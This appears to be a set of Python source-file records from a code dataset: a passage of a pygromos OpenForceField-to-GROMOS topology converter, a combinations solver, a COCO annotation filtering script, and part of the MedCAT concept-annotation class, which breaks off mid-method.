self.molecule_force_list = self.off.label_molecules(self.openFFTop)\n\n # 1-3 / 1-4 exclusion lists\n self.exclusionList13 = dict()\n self.exclusionList14 = dict()\n\n def convertResname(self):\n if len(self.openFFmolecule.name) >= 1:\n self.gromosTop.add_new_resname(self.openFFmolecule.name)\n else:\n self.gromosTop.add_new_resname(self.openFFmolecule.hill_formula)\n \n def convertBonds(self):\n for molecule in self.molecule_force_list:\n for key in molecule[\"Bonds\"]:\n force = molecule[\"Bonds\"][key]\n #hQ = topology.atom(force[0]).atomic_number == 1 or topology.atom(force[1]).atomic_number == 1\n hQ = not all([self.openFFTop.atom(x).atomic_number != 1 for x in key])\n atomI = key[0]+1\n atomJ = key[1]+1\n k = force.k.value_in_unit(u.kilojoule / (u.mole * u.nanometer ** 2))\n b0 = force.length.value_in_unit(u.nanometer)\n self.gromosTop.add_new_bond(k=k, b0=b0, atomI=atomI, atomJ=atomJ, includesH=False) #hQ\n if not hasattr(self.gromosTop, \"BONDSTRETCHTYPE\"):\n self.gromosTop.add_block(blocktitle=\"BONDSTRETCHTYPE\", content=[])\n if not hasattr(self.gromosTop, \"BONDH\"):\n self.gromosTop.add_block(blocktitle=\"BONDH\", content=[])\n if not hasattr(self.gromosTop, \"BOND\"):\n self.gromosTop.add_block(blocktitle=\"BOND\", content=[])\n\n def convertAngles(self):\n for molecule in self.molecule_force_list:\n for key in molecule[\"Angles\"]:\n force = molecule[\"Angles\"][key]\n hQ = not all([self.openFFTop.atom(x).atomic_number != 1 for x in key])\n atomI=key[0]+1\n atomJ=key[1]+1\n atomK=key[2]+1\n k = force.k.value_in_unit(u.kilojoule / (u.mole * u.radian ** 2))\n kh = force.k.value_in_unit(u.kilojoule / (u.mole * u.degree ** 2))\n b0 = force.angle.value_in_unit(u.degree)\n self.gromosTop.add_new_angle(k=k, kh=kh, b0=b0, atomI=atomI, atomJ=atomJ, atomK=atomK, includesH=False) #hQ\n if not hasattr(self.gromosTop, \"BONDANGLEBENDTYPE\"):\n self.gromosTop.add_block(blocktitle=\"BONDANGLEBENDTYPE\", content=[])\n if not hasattr(self.gromosTop, \"BONDANGLEH\"):\n self.gromosTop.add_block(blocktitle=\"BONDANGLEH\", content=[])\n if not hasattr(self.gromosTop, \"BONDANGLE\"):\n self.gromosTop.add_block(blocktitle=\"BONDANGLE\", content=[])\n\n def convertTosions(self):\n for molecule in self.molecule_force_list:\n for key in molecule[\"ProperTorsions\"]:\n force = molecule[\"ProperTorsions\"][key]\n hQ = not all([self.openFFTop.atom(x).atomic_number != 1 for x in key])\n atomI=key[0]+1\n atomJ=key[1]+1\n atomK=key[2]+1\n atomL=key[3]+1\n k_list = force.k\n phase_list = force.phase\n per_list = force.periodicity\n for t in range(len(k_list)):\n CP=k_list[t].value_in_unit(u.kilojoule/u.mole)\n PD=phase_list[t].value_in_unit(u.degree)\n NP=per_list[t]\n # convert negativ CP by phase shifting\n if CP < 0:\n CP = abs(CP)\n PD += 180\n self.gromosTop.add_new_torsiondihedral(CP=CP, PD=PD, NP=NP, atomI=atomI, atomJ=atomJ, atomK=atomK, atomL=atomL, includesH=False)#hQ\n if not hasattr(self.gromosTop, \"TORSDIHEDRALTYPE\"):\n self.gromosTop.add_block(blocktitle=\"TORSDIHEDRALTYPE\", content=[])\n if not hasattr(self.gromosTop, \"DIHEDRALH\"):\n self.gromosTop.add_block(blocktitle=\"DIHEDRALH\", content=[])\n if not hasattr(self.gromosTop, \"DIHEDRAL\"):\n self.gromosTop.add_block(blocktitle=\"DIHEDRAL\", content=[])\n\n def convertImproper(self):\n for molecule in self.molecule_force_list:\n for key in molecule[\"ImproperTorsions\"]:\n force = molecule[\"ImproperTorsions\"][key]\n hQ = not all([self.openFFTop.atom(x).atomic_number != 1 for x in key])\n atomI=key[0]+1\n atomJ=key[1]+1\n atomK=key[2]+1\n atomL=key[3]+1\n k_list = force.k\n phase_list = force.phase\n per_list = force.periodicity\n for t in range(len(k_list)):\n CP=k_list[t].value_in_unit(u.kilojoule/u.mole)\n PD=phase_list[t].value_in_unit(u.degree)\n NP=per_list[t]\n self.gromosTop.add_new_torsiondihedral(CP=CP, PD=PD, NP=NP, atomI=atomI, atomJ=atomJ, atomK=atomK, atomL=atomL, includesH=False) #hQ\n if not hasattr(self.gromosTop, \"IMPDIHEDRALTYPE\"):\n self.gromosTop.add_block(blocktitle=\"IMPDIHEDRALTYPE\", content=[])\n if not hasattr(self.gromosTop, \"IMPDIHEDRALH\"):\n self.gromosTop.add_block(blocktitle=\"IMPDIHEDRALH\", content=[])\n if not hasattr(self.gromosTop, \"IMPDIHEDRAL\"):\n self.gromosTop.add_block(blocktitle=\"IMPDIHEDRAL\", content=[])\n\n def createVdWexclusionList_backup(self) -> dict:\n exclusionlist=dict()\n for molecule in self.molecule_force_list:\n for key in molecule[\"Bonds\"]:\n if not str(key[0]) in exclusionlist.keys():\n exclusionlist[str(key[0])] = {key[1]}\n exclusionlist[str(key[0])].add(key[1])\n if not str(key[1]) in exclusionlist.keys():\n exclusionlist[str(key[1])] = {key[0]}\n exclusionlist[str(key[1])].add(key[0])\n for key in molecule[\"Angles\"]:\n if not str(key[0]) in exclusionlist.keys():\n exclusionlist[str(key[0])] = {key[1]}\n exclusionlist[str(key[0])].add(key[1])\n exclusionlist[str(key[0])].add(key[2])\n if not str(key[1]) in exclusionlist.keys():\n exclusionlist[str(key[1])] = {key[0]}\n exclusionlist[str(key[1])].add(key[0])\n exclusionlist[str(key[1])].add(key[2])\n if not str(key[2]) in exclusionlist.keys():\n exclusionlist[str(key[2])] = {key[0]}\n exclusionlist[str(key[2])].add(key[0])\n exclusionlist[str(key[2])].add(key[1])\n for key in molecule[\"ProperTorsions\"]:\n if not str(key[0]) in exclusionlist.keys():\n exclusionlist[str(key[0])] = {key[1]}\n exclusionlist[str(key[0])].add(key[1])\n exclusionlist[str(key[0])].add(key[2])\n exclusionlist[str(key[0])].add(key[3])\n if not str(key[1]) in exclusionlist.keys():\n exclusionlist[str(key[1])] = {key[0]}\n exclusionlist[str(key[1])].add(key[0])\n exclusionlist[str(key[1])].add(key[2])\n exclusionlist[str(key[1])].add(key[3])\n if not str(key[2]) in exclusionlist.keys():\n exclusionlist[str(key[2])] = {key[0]}\n exclusionlist[str(key[2])].add(key[0])\n exclusionlist[str(key[2])].add(key[1])\n exclusionlist[str(key[2])].add(key[3])\n if not str(key[3]) in exclusionlist.keys():\n exclusionlist[str(key[3])] = {key[0]}\n exclusionlist[str(key[3])].add(key[0])\n exclusionlist[str(key[3])].add(key[1])\n exclusionlist[str(key[3])].add(key[2])\n for key in molecule[\"ImproperTorsions\"]:\n if not str(key[0]) in exclusionlist.keys():\n exclusionlist[str(key[0])] = {key[1]}\n exclusionlist[str(key[0])].add(key[1])\n exclusionlist[str(key[0])].add(key[2])\n exclusionlist[str(key[0])].add(key[3])\n if not str(key[1]) in exclusionlist.keys():\n exclusionlist[str(key[1])] = {key[0]}\n exclusionlist[str(key[1])].add(key[0])\n exclusionlist[str(key[1])].add(key[2])\n exclusionlist[str(key[1])].add(key[3])\n if not str(key[2]) in exclusionlist.keys():\n exclusionlist[str(key[2])] = {key[0]}\n exclusionlist[str(key[2])].add(key[0])\n exclusionlist[str(key[2])].add(key[1])\n exclusionlist[str(key[2])].add(key[3])\n if not str(key[3]) in exclusionlist.keys():\n exclusionlist[str(key[3])] = {key[0]}\n exclusionlist[str(key[3])].add(key[0])\n exclusionlist[str(key[3])].add(key[1])\n exclusionlist[str(key[3])].add(key[2])\n #now we should have added everything and we can start to delete\n for key in exclusionlist:\n for i in range(0, int(key) + 1):\n exclusionlist[key].discard(i)\n return exclusionlist\n\n def createVdWexclusionList(self):\n bondDict=dict()\n ex13 = dict()\n ex14 = dict()\n # create a list of all bonds\n for molecule in self.molecule_force_list:\n for key in molecule[\"Bonds\"]:\n if not str(key[0]) in bondDict.keys():\n bondDict[str(key[0])] = {key[1]}\n bondDict[str(key[0])].add(key[1])\n if not str(key[1]) in bondDict.keys():\n bondDict[str(key[1])] = {key[0]}\n bondDict[str(key[1])].add(key[0])\n #use bond dict to createexclusion lists\n for lvl1 in bondDict:\n ex13[lvl1] = bondDict[lvl1].copy()\n ex14[lvl1] = bondDict[lvl1].copy() #just init 1-3 values will be removed later\n for lvl2 in bondDict[lvl1]:\n ex13[lvl1].add(lvl2)\n for lvl3 in bondDict[str(lvl2)]:\n ex13[lvl1].add(lvl3)\n for lvl4 in bondDict[str(lvl3)]:\n ex14[lvl1].add(lvl4)\n # remove 1-3 from 1-4\n for key in ex14:\n for i in ex13[key]:\n ex14[key].discard(i)\n # remove all smaller entries\n for key in ex13:\n for i in range(0, int(key) + 1):\n ex13[key].discard(i)\n for key in ex14:\n for i in range(0, int(key) + 1):\n ex14[key].discard(i)\n \n # return\n self.exclusionList13 = ex13\n self.exclusionList14 = ex14\n\n\n\n def convertVdW(self):\n self.createVdWexclusionList()\n moleculeItr = 1\n for molecule in self.molecule_force_list:\n panm_dict = collections.defaultdict(int)\n for key in molecule[\"vdW\"]:\n force = molecule[\"vdW\"][key]\n ATNM = int(key[0]) + 1\n MRES = moleculeItr\n # get element sympol: \n atomic_number = self.openFFmolecule.atoms[int(key[0])].atomic_number\n element_symbol = self.atomic_number_dict[atomic_number]\n panm_dict[element_symbol] += 1\n PANM = element_symbol + str(panm_dict[element_symbol])\n IAC = 0\n MASS = self.openFFmolecule.atoms[int(key[0])].mass.value_in_unit(u.dalton)\n CG = 0\n CGC = 1 \n if str(key[0]) in self.exclusionList13:\n openFFexList13 = list(self.exclusionList13[str(key[0])])\n INE = [int(x)+1 for x in openFFexList13]\n else:\n INE = list()\n if str(key[0]) in self.exclusionList14:\n openFFexList14 = list(self.exclusionList14[str(key[0])])\n INE14 = [int(x)+1 for x in openFFexList14]\n else:\n INE14 = list()\n epsilon = float(force.epsilon.value_in_unit(u.kilojoule_per_mole))\n rmin = 2 * force.rmin_half.value_in_unit(u.nanometer)\n C6 = 2 * epsilon * (rmin**6)\n C12 = epsilon * (rmin**12)\n IACname = force.id\n self.gromosTop.add_new_atom(ATNM=ATNM, MRES=MRES, PANM=PANM, IAC=IAC, MASS=MASS, CG=CG, CGC=CGC, INE=INE, INE14=INE14, C6=C6, C12=C12, IACname=IACname)\n moleculeItr += 1\n\n def convert_other_stuff(self):\n if not hasattr(self.gromosTop, \"SOLUTEMOLECULES\"):\n self.gromosTop.add_block(blocktitle=\"SOLUTEMOLECULES\", content=['1', str(self.openFFmolecule.n_atoms)])\n else:\n self.gromosTop.SOLUTEMOLECULES.content = [['1'], [str(self.openFFmolecule.n_atoms)]]\n if not hasattr(self.gromosTop, \"TEMPERATUREGROUPS\"):\n self.gromosTop.add_block(blocktitle=\"TEMPERATUREGROUPS\", content=['1', str(self.openFFmolecule.n_atoms)])\n else:\n self.gromosTop.TEMPERATUREGROUPS.content = [['1'], [str(self.openFFmolecule.n_atoms)]]\n if not hasattr(self.gromosTop, \"PRESSUREGROUPS\"):\n self.gromosTop.add_block(blocktitle=\"PRESSUREGROUPS\", content=['1', str(self.openFFmolecule.n_atoms)])\n else:\n self.gromosTop.PRESSUREGROUPS.content = [['1'], [str(self.openFFmolecule.n_atoms)]]\n if not hasattr(self.gromosTop, \"LJEXCEPTIONS\"):\n self.gromosTop.add_block(blocktitle=\"LJEXCEPTIONS\", content=['0',''])\n if not hasattr(self.gromosTop, \"SOLVENTATOM\"):\n self.gromosTop.add_block(blocktitle=\"SOLVENTATOM\", content=['0',''])\n if not hasattr(self.gromosTop, \"SOLVENTCONSTR\"):\n self.gromosTop.add_block(blocktitle=\"SOLVENTCONSTR\", content=['0',''])\n if not hasattr(self.gromosTop, \"TOPVERSION\"):\n self.gromosTop.add_block(blocktitle=\"TOPVERSION\", content=['2.0'])\n if not hasattr(self.gromosTop, \"PHYSICALCONSTANTS\"):\n self.gromosTop.add_block(blocktitle=\"PHYSICALCONSTANTS\", content=[\"\"])\n\n def convert(self):\n #print OpenFF warning in Title\n titleString = \"\"\n titleString += \"\\n\\tname: \" + self.openFFmolecule.name + \"\\t hill_formula: \" + self.openFFmolecule.hill_formula\n titleString += \"\\n\\t\" + 40*\"-\" + \"\\n\\t| created from OpenForceField topology |\\n\\t| use Amber Block for OpenFF topology! |\\n\\t\" + 40*\"-\"+\"\\n\"\n if hasattr(self.gromosTop, \"TITLE\"):\n self.gromosTop.TITLE.content += [titleString]\n else:\n self.gromosTop.add_block(blocktitle=\"TITLE\", content=[titleString])\n #Do all the conversions\n self.convertResname()\n self.convertBonds()\n self.convertAngles()\n self.convertTosions()\n self.convertImproper()\n self.convertVdW()\n self.convert_other_stuff()\n\n def convert_return(self) -> Top:\n self.convert()\n return self.gromosTop\n","sub_path":"pygromos/files/gromos_system/ff/openforcefield2gromos.py","file_name":"openforcefield2gromos.py","file_ext":"py","file_size_in_byte":17598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"313116945","text":"class Solution:\n def helper(self, candidates, k):\n if k == 0:\n return []\n if k == 1:\n return [[c] for c in candidates]\n res = []\n for i in range(len(candidates)):\n next_combinations = self.helper(candidates[i + 1:], k - 1)\n for c in next_combinations:\n res.append([candidates[i]] + c)\n return res\n\n def combine(self, n, k):\n candidates = list(range(1, n + 1))\n res = self.helper(candidates, k)\n return res","sub_path":"combinations/combinations.py","file_name":"combinations.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"445327839","text":"import coco\nfrom coco import Image, ImageId, AnnotationId\nimport argparse\nimport time\nimport numpy as np\n\n\ndef getargs():\n parser = argparse.ArgumentParser(description='Process some integers.')\n # http://ja.pymotw.com/2/argparse/\n parser.add_argument(\"inputfiles\", nargs=2)\n parser.add_argument('--image', action='store_true', default=False)\n parser.add_argument('--annotation', action='store_true', default=False)\n parser.add_argument('-o', dest='outputfile',\n type=str, default='intersection.json')\n\n return parser.parse_args()\n\n\ndef main():\n args = getargs()\n\n if not (args.image or args.annotation):\n args.image = True\n id_txt = args.inputfiles[1]\n ids = np.loadtxt(fname=id_txt, dtype=\"int\")\n begin_time = int(round(time.time() * 1000))\n with coco.coco(args.inputfiles[0]) as data:\n end_time = int(round(time.time() * 1000))\n print(f'finish load {end_time-begin_time} ms', flush=True)\n filtered_ids = ids\n print('begin filter')\n begin_time = int(round(time.time() * 1000))\n if args.image:\n filtered_ids = ImageId(filtered_ids)\n else:\n filtered_ids = AnnotationId(filtered_ids)\n c2 = data & filtered_ids\n end_time = int(round(time.time() * 1000))\n print(f'finish filter {end_time-begin_time} ms', flush=True)\n c2.save(args.outputfile)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"intersection_id.py","file_name":"intersection_id.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"240313051","text":"import os\nimport json\nimport pandas\nimport spacy\nfrom time import sleep\nfrom functools import partial\nfrom multiprocessing import Process, Manager, Queue, Pool, Array\nfrom medcat.cdb import CDB\nfrom medcat.spacy_cat import SpacyCat\nfrom medcat.preprocessing.tokenizers import spacy_split_all\nfrom medcat.utils.spelling import CustomSpellChecker\nfrom medcat.utils.spacy_pipe import SpacyPipe\nfrom medcat.preprocessing.cleaners import spacy_tag_punct\nfrom medcat.utils.helpers import get_all_from_name, tkn_inds_from_doc\nfrom medcat.utils.loggers import basic_logger\nimport sys, traceback\n\nlog = basic_logger(\"CAT\")\n\nclass CAT(object):\n \"\"\" Annotate a dataset\n \"\"\"\n SEPARATOR = \"\"\n NESTED_ENTITIES = os.getenv(\"NESTED_ENTITIES\", 'false').lower() == 'true'\n KEEP_PUNCT = os.getenv(\"KEEP_PUNCT\", \":|.\").split(\"|\")\n\n def __init__(self, cdb, vocab=None, skip_stopwords=True, meta_cats=[]):\n self.cdb = cdb\n self.vocab = vocab\n # Build the required spacy pipeline\n self.nlp = SpacyPipe(spacy_split_all)\n #self.nlp.add_punct_tagger(tagger=spacy_tag_punct)\n self.nlp.add_punct_tagger(tagger=partial(spacy_tag_punct,\n skip_stopwords=skip_stopwords,\n keep_punct=self.KEEP_PUNCT))\n\n # Add spell checker pipe\n self.spell_checker = CustomSpellChecker(cdb_vocab=self.cdb.vocab, data_vocab=self.vocab)\n self.nlp.add_spell_checker(spell_checker=self.spell_checker)\n\n # Add cat\n self.spacy_cat = SpacyCat(cdb=self.cdb, vocab=self.vocab)\n self.nlp.add_cat(spacy_cat=self.spacy_cat)\n\n self._meta_annotations = False\n for meta_cat in meta_cats:\n self.nlp.add_meta_cat(meta_cat, meta_cat.category_name)\n self._meta_annotations = True\n\n\n def __call__(self, text):\n return self.nlp(text)\n\n\n def add_concept_cntx(self, cui, text, tkn_inds, negative=False, lr=None, anneal=None, spacy_doc=None):\n if spacy_doc is None:\n spacy_doc = self(text)\n tkns = [spacy_doc[ind] for ind in range(tkn_inds[0], tkn_inds[-1] + 1)]\n self.spacy_cat._add_cntx_vec(cui=cui, doc=spacy_doc, tkns=tkns,\n negative=negative, lr=lr, anneal=anneal)\n\n\n def unlink_concept_name(self, cui, name, full_unlink=True):\n names = [name, name.lower()]\n # Unlink a concept from a name\n p_name, tokens, _, _ = get_all_from_name(name=name, source_value=name, nlp=self.nlp, version='clean')\n # Add the clean version of the name\n names.append(p_name)\n # Get the raw version\n p_name, tokens, _, _ = get_all_from_name(name=name, source_value=name, nlp=self.nlp, version='raw')\n # Append the raw evrsion\n names.append(p_name)\n\n if tokens[-1].lower() == \"s\":\n # Remove last 's' - a stupid bug\n names.append(p_name[0:-1])\n\n for name in names:\n cuis = [cui]\n if full_unlink and name in self.cdb.name2cui:\n cuis = list(self.cdb.name2cui[name])\n\n for cui in cuis:\n if cui in self.cdb.cui2names and name in self.cdb.cui2names[cui]:\n self.cdb.cui2names[cui].remove(name)\n if len(self.cdb.cui2names[cui]) == 0:\n del self.cdb.cui2names[cui]\n\n if name in self.cdb.name2cui:\n if cui in self.cdb.name2cui[name]:\n self.cdb.name2cui[name].remove(cui)\n\n if len(self.cdb.name2cui[name]) == 0:\n del self.cdb.name2cui[name]\n\n\n def _add_name(self, cui, source_val, is_pref_name, only_new=False, desc=None, tui=None):\n onto = 'def'\n all_cuis = []\n\n if cui in self.cdb.cui2ontos and self.cdb.cui2ontos[cui]:\n onto = list(self.cdb.cui2ontos[cui])[0]\n\n # Add the original version of the name just lowercased\n p_name, tokens, snames, tokens_vocab = get_all_from_name(name=source_val,\n source_value=source_val,\n nlp=self.nlp, version='none')\n if cui not in self.cdb.cui2names or p_name not in self.cdb.cui2names[cui]:\n if not only_new or p_name not in self.cdb.name2cui:\n self.cdb.add_concept(cui, p_name, onto, tokens, snames, tokens_vocab=tokens_vocab,\n original_name=source_val, is_pref_name=False, desc=desc, tui=tui)\n all_cuis.extend(self.cdb.name2cui[p_name])\n\n p_name, tokens, snames, tokens_vocab = get_all_from_name(name=source_val,\n source_value=source_val,\n nlp=self.nlp, version='clean')\n # This will add a new concept if the cui doesn't exist\n # or link the name to an existing concept if it exists.\n if cui not in self.cdb.cui2names or p_name not in self.cdb.cui2names[cui]:\n if not only_new or p_name not in self.cdb.name2cui:\n self.cdb.add_concept(cui, p_name, onto, tokens, snames, tokens_vocab=tokens_vocab,\n original_name=source_val, is_pref_name=False, desc=desc, tui=tui)\n all_cuis.extend(self.cdb.name2cui[p_name])\n\n # Add the raw also if needed\n p_name, tokens, snames, tokens_vocab = get_all_from_name(name=source_val,\n source_value=source_val,\n nlp=self.nlp, version='raw')\n if cui not in self.cdb.cui2names or p_name not in self.cdb.cui2names[cui] or is_pref_name:\n if not only_new or p_name not in self.cdb.name2cui:\n self.cdb.add_concept(cui, p_name, onto, tokens, snames, tokens_vocab=tokens_vocab,\n original_name=source_val, is_pref_name=is_pref_name, desc=desc, tui=tui)\n all_cuis.extend(self.cdb.name2cui[p_name])\n\n # Fix for ntkns in cdb\n if p_name in self.cdb.name2ntkns:\n if len(tokens) not in self.cdb.name2ntkns[p_name]:\n self.cdb.name2ntkns[p_name].add(len(tokens))\n\n return list(set(all_cuis))\n\n\n def add_name(self, cui, source_val, text=None, is_pref_name=False, tkn_inds=None, text_inds=None,\n spacy_doc=None, lr=None, anneal=None, negative=False, only_new=False, desc=None, tui=None,\n manually_created=False):\n \"\"\" Adds a new concept or appends the name to an existing concept\n if the cui already exists in the DB.\n\n cui: Concept uniqe ID\n source_val: Source value in the text\n text: the text of a document where source_val was found\n \"\"\"\n # First add the name, get bac all cuis that link to this name\n all_cuis = self._add_name(cui, source_val, is_pref_name, only_new=only_new, desc=desc, tui=tui)\n\n # Now add context if text is present\n if (text is not None and (source_val in text or text_inds)) or \\\n (spacy_doc is not None and (text_inds or tkn_inds)):\n if spacy_doc is None:\n spacy_doc = self(text)\n\n if tkn_inds is None:\n tkn_inds = tkn_inds_from_doc(spacy_doc=spacy_doc, text_inds=text_inds,\n source_val=source_val)\n\n if tkn_inds is not None and len(tkn_inds) > 0:\n self.add_concept_cntx(cui, text, tkn_inds, spacy_doc=spacy_doc, lr=lr, anneal=anneal,\n negative=negative)\n\n if manually_created:\n all_cuis.remove(cui)\n for _cui in all_cuis:\n self.add_concept_cntx(_cui, text, tkn_inds, spacy_doc=spacy_doc, lr=lr, anneal=anneal,\n negative=True)\n\n\n def _print_stats(self, data, epoch=0, use_filters=False, use_overlaps=False):\n tp = 0\n fp = 0\n fn = 0\n fps = {}\n fns = {}\n tps = {}\n cui_prec = {}\n cui_rec = {}\n cui_f1 = {}\n\n docs_with_problems = set()\n if self.spacy_cat.TUI_FILTER is None:\n _tui_filter = None\n else:\n _tui_filter = list(self.spacy_cat.TUI_FILTER)\n if self.spacy_cat.CUI_FILTER is None:\n _cui_filter = None\n else:\n _cui_filter = list(self.spacy_cat.CUI_FILTER)\n\n # Stupid\n for project in data['projects']:\n cui_filter = None\n tui_filter = None\n\n if use_filters:\n if 'cuis' in project and len(project['cuis'].strip()) > 0:\n cui_filter = [x.strip().upper() for x in project['cuis'].split(\",\")]\n if 'tuis' in project and len(project['tuis'].strip()) > 0:\n tui_filter = [x.strip().upper() for x in project['tuis'].split(\",\")]\n\n self.spacy_cat.TUI_FILTER = tui_filter\n self.spacy_cat.CUI_FILTER = cui_filter\n\n for doc in project['documents']:\n spacy_doc = self(doc['text'])\n anns = doc['annotations']\n if use_overlaps:\n p_anns = spacy_doc._.ents\n else:\n p_anns = spacy_doc.ents\n\n anns_norm = []\n for ann in anns:\n if ann.get('validated', True) and (not ann.get('killed', False) and not ann.get('deleted', False)):\n anns_norm.append((ann['start'], ann['cui']))\n p_anns_norm = []\n for ann in p_anns:\n p_anns_norm.append((ann.start_char, ann._.cui))\n\n for ann in p_anns_norm:\n if ann in anns_norm:\n tp += 1\n\n if ann[1] in tps:\n tps[ann[1]] += 1\n else:\n tps[ann[1]] = 1\n else:\n if ann[1] in fps:\n fps[ann[1]] += 1\n else:\n fps[ann[1]] = 1\n fp += 1\n docs_with_problems.add(doc['name'])\n\n for ann in anns_norm:\n if ann not in p_anns_norm:\n fn += 1\n docs_with_problems.add(doc['name'])\n\n if ann[1] in fns:\n fns[ann[1]] += 1\n else:\n fns[ann[1]] = 1\n try:\n prec = tp / (tp + fp)\n rec = tp / (tp + fn)\n f1 = (prec + rec) / 2\n print(\"Epoch: {}, Prec: {}, Rec: {}, F1: {}\".format(epoch, prec, rec, f1))\n print(\"First 10 out of {} docs with problems: {}\".format(len(docs_with_problems),\n \"; \".join([str(x) for x in list(docs_with_problems)[0:10]])))\n\n # Sort fns & prec\n fps = {k: v for k, v in sorted(fps.items(), key=lambda item: item[1], reverse=True)}\n fns = {k: v for k, v in sorted(fns.items(), key=lambda item: item[1], reverse=True)}\n tps = {k: v for k, v in sorted(tps.items(), key=lambda item: item[1], reverse=True)}\n\n\n # F1 per concept\n for cui in tps.keys():\n prec = tps[cui] / (tps.get(cui, 0) + fps.get(cui, 0))\n rec = tps[cui] / (tps.get(cui, 0) + fns.get(cui, 0))\n f1 = (prec + rec) / 2\n cui_prec[cui] = prec\n cui_rec[cui] = rec\n cui_f1[cui] = f1\n\n\n # Get top 10\n pr_fps = [(self.cdb.cui2pretty_name.get(cui,\n list(self.cdb.cui2original_names.get(cui, [\"UNK\"]))[0]), cui, fps[cui]) for cui in list(fps.keys())[0:10]]\n pr_fns = [(self.cdb.cui2pretty_name.get(cui,\n list(self.cdb.cui2original_names.get(cui, [\"UNK\"]))[0]), cui, fns[cui]) for cui in list(fns.keys())[0:10]]\n pr_tps = [(self.cdb.cui2pretty_name.get(cui,\n list(self.cdb.cui2original_names.get(cui, [\"UNK\"]))[0]), cui, tps[cui]) for cui in list(tps.keys())[0:10]]\n\n\n print(\"\\n\\nFalse Positives\\n\")\n for one in pr_fps:\n print(\"{:70} - {:20} - {:10}\".format(one[0], one[1], one[2]))\n print(\"\\n\\nFalse Negatives\\n\")\n for one in pr_fns:\n print(\"{:70} - {:20} - {:10}\".format(one[0], one[1], one[2]))\n print(\"\\n\\nTrue Positives\\n\")\n for one in pr_tps:\n print(\"{:70} - {:20} - {:10}\".format(one[0], one[1], one[2]))\n print(\"*\"*110 + \"\\n\")\n\n\n except Exception as e:\n traceback.print_exc()\n\n self.spacy_cat.TUI_FILTER = _tui_filter\n self.spacy_cat.CUI_FILTER = _cui_filter\n\n return fps, fns, tps, cui_prec, cui_rec, cui_f1\n\n\n def train_supervised(self, data_path, reset_cdb=False, reset_cui_count=False, nepochs=30, lr=None,\n anneal=None, print_stats=False, test_set=None, use_filters=False):\n \"\"\" Given data learns vector embeddings for concepts\n in a suppervised way.\n\n data_path: path to data in json format\n \"\"\"\n self.train = False\n data = json.load(open(data_path))\n\n if print_stats:\n if test_set:\n self._print_stats(test_set, use_filters=use_filters)\n else:\n self._print_stats(data, use_filters=use_filters)\n\n if reset_cdb:\n self.cdb = CDB()\n self.spacy_cat.cdb = self.cdb\n self.spacy_cat.cat_ann.cdb = self.cdb\n\n if reset_cui_count:\n # Get all CUIs\n cuis = []\n for project in data['projects']:\n for doc in project['documents']:\n for ann in doc['annotations']:\n cuis.append(ann['cui'])\n for cui in set(cuis):\n if cui in self.cdb.cui_count:\n self.cdb.cui_count[cui] = 10\n\n # Remove entites that were terminated\n for project in data['projects']:\n for doc in project['documents']:\n for ann in doc['annotations']:\n if ann.get('killed', False):\n self.unlink_concept_name(ann['cui'], ann['value'])\n\n for epoch in range(nepochs):\n print(\"Starting epoch: {}\".format(epoch))\n log.info(\"Starting epoch: {}\".format(epoch))\n # Print acc before training\n\n for project in data['projects']:\n for i_doc, doc in enumerate(project['documents']):\n spacy_doc = self(doc['text'])\n for ann in doc['annotations']:\n if not ann.get('killed', False):\n cui = ann['cui']\n start = ann['start']\n end = ann['end']\n deleted = ann.get('deleted', False)\n manually_created = ann.get('manually_created', False)\n self.add_name(cui=cui,\n source_val=ann['value'],\n spacy_doc=spacy_doc,\n text_inds=[start, end],\n negative=deleted,\n lr=lr,\n anneal=anneal,\n manually_created=manually_created)\n if epoch % 5 == 0:\n if print_stats:\n if test_set:\n self._print_stats(test_set, epoch=epoch+1, use_filters=use_filters)\n else:\n self._print_stats(data, epoch=epoch+1, use_filters=use_filters)\n\n\n\n @property\n def train(self):\n return self.spacy_cat.train\n\n\n @train.setter\n def train(self, val):\n self.spacy_cat.train = val\n\n\n def run_training(self, data_iterator, fine_tune=False):\n \"\"\" Runs training on the data\n\n data_iterator: Simple iterator over sentences/documents, e.g. a open file\n or an array or anything else that we can use in a for loop.\n fine_tune: If False old training will be removed\n \"\"\"\n self.train = True\n cnt = 0\n\n if not fine_tune:\n print(\"Removing old training data!\\n\")\n self.cdb.reset_training()\n self.cdb.coo_dict = {}\n self.spacy_cat._train_skip_names = {}\n\n for line in data_iterator:\n if line is not None:\n try:\n _ = self(line)\n except Exception as e:\n print(\"LINE: '{}' \\t WAS SKIPPED\".format(line))\n print(\"BECAUSE OF: \" + str(e))\n if cnt % 1000 == 0:\n print(\"DONE: \" + str(cnt))\n cnt += 1\n self.train = False\n\n\n def get_entities(self, text, cat_filter=None, only_cui=False):\n \"\"\" Get entities\n\n text: text to be annotated\n return: entities\n \"\"\"\n doc = self(text)\n out = []\n\n if cat_filter:\n cat_filter(doc, self)\n\n out_ent = {}\n if self.NESTED_ENTITIES:\n _ents = doc._.ents\n else:\n _ents = doc.ents\n\n for ind, ent in enumerate(_ents):\n cui = str(ent._.cui)\n if not only_cui:\n out_ent['cui'] = cui\n out_ent['tui'] = str(ent._.tui)\n out_ent['type'] = str(self.cdb.tui2name.get(out_ent['tui'], ''))\n out_ent['source_value'] = str(ent.text)\n out_ent['acc'] = str(ent._.acc)\n out_ent['start'] = ent.start_char\n out_ent['end'] = ent.end_char\n out_ent['id'] = str(ent._.id)\n out_ent['pretty_name'] = self.cdb.cui2pretty_name.get(cui, '')\n\n if cui in self.cdb.cui2info and 'icd10' in self.cdb.cui2info[cui]:\n icds = []\n for icd10 in self.cdb.cui2info[cui]['icd10']:\n icds.append(str(icd10['chapter']))\n out_ent['icd10'] = \",\".join(icds)\n else:\n out_ent['icd10'] = \"\"\n\n if cui in self.cdb.cui2info and 'umls' in self.cdb.cui2info[cui]:\n umls = [str(u) for u in self.cdb.cui2info[cui]['umls']]\n out_ent['umls'] = \",\".join(umls)\n else:\n out_ent['umls'] = ''\n\n if cui in self.cdb.cui2info and 'snomed' in self.cdb.cui2info[cui]:\n snomed = [str(u) for u in self.cdb.cui2info[cui]['snomed']]\n out_ent['snomed'] = \",\".join(snomed)\n else:\n out_ent['snomed'] = ''\n\n if hasattr(ent._, 'meta_anns') and ent._.meta_anns:\n 